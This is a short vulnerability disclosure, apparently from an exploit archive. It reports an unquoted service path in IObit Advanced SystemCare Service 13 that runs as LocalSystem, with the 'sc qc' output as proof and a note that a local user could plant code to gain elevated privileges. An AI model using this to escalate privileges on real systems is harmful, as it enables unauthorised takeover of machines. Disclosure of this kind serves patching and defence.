Share
## https://sploitus.com/exploit?id=PACKETSTORM:160068
# Title: Advanced System Care Service 13 - 'AdvancedSystemCareService13' Unquoted Service Path  
# Author: Jair Amezcua  
# Date: 2020-11-10  
# Vendor Homepage: https://www.iobit.com  
# Software Link: https://www.iobit.com/es/advancedsystemcarepro.php  
# Version : 13.0.0.157  
# Tested on: Windows 10 64bit(EN)  
# CVE : N/A  
  
# 1. Description:  
# Unquoted service paths in Advanced System Care Service 13 v13.0.0.157 have an unquoted service path.  
  
# PoC  
===========  
  
C:\>sc qc AdvancedSystemCareService13  
[SC] QueryServiceConfig SUCCESS  
SERVICE_NAME: AdvancedSystemCareService13  
TYPE : 10 WIN32_OWN_PROCESS  
START_TYPE : 2 AUTO_START  
ERROR_CONTROL : 1 NORMAL  
BINARY_PATH_NAME : C:\Program Files (x86)\Advanced SystemCare Pro\ASCService.exe  
LOAD_ORDER_GROUP : System Reserved  
TAG : 0  
DISPLAY_NAME : Advanced SystemCare Service 13  
DEPENDENCIES :  
SERVICE_START_NAME : LocalSystem  
  
  
  
#Description Exploit:  
# A successful attempt would require the local user to be able to insert their code in the system root path   
# undetected by the OS or other security applications where it could potentially be executed during   
# application startup or reboot. If successful, the local user's code would execute with the elevated   
# privileges of the application.